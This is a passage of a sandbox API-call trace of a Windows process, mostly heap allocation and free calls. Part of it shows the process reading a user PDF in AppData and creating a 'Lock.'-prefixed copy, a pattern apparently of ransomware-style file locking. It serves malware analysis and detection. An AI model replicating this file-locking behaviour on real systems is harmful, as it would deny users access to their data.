lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0230.388] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0230.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0230.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0230.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0230.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0230.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0230.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0230.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0230.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0230.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0230.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0230.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0230.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0230.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0230.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0230.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0230.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0230.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0230.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0230.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0230.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0230.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0230.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0230.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0230.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0230.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0230.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0230.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0230.392] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0230.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0230.393] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0230.393] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0230.393] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0230.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0230.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0230.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0230.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0230.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0230.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0230.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0230.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0230.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0230.434] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/EQBMxAkSv-.pdf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\eqbmxaksv-.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0230.435] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0230.435] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0230.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0230.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0230.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0230.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0230.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0230.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0230.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0230.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.435] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0230.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0230.435] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0230.435] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0230.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0230.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0230.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0230.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0230.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0230.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0230.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0230.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0230.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0230.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0230.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0230.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.436] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0230.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0230.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0230.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0230.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0230.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0230.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0230.436] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.EQBMxAkSv-.pdf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.eqbmxaksv-.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0230.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0230.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0230.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0230.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0230.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0230.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0230.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0230.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0230.437] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0230.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0230.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0230.437] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0230.437] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0230.437] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0230.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0230.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0230.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0230.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0230.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0230.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0230.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0230.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0230.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0230.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0230.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0230.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0230.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0230.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5b020 [0230.439] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0230.439] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0xd640, lpOverlapped=0x0) returned 1 [0230.441] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0230.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0230.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0230.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0230.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0230.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd640) returned 0x2f14818 [0230.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5b020 | out: hHeap=0x970000) returned 1 [0230.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0230.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0230.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0230.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0230.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd640) returned 0x2f21e60 [0230.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0230.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0230.444] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0230.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0230.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0230.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0230.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd640) returned 0x2f14818 [0230.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0230.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0230.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0230.445] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) 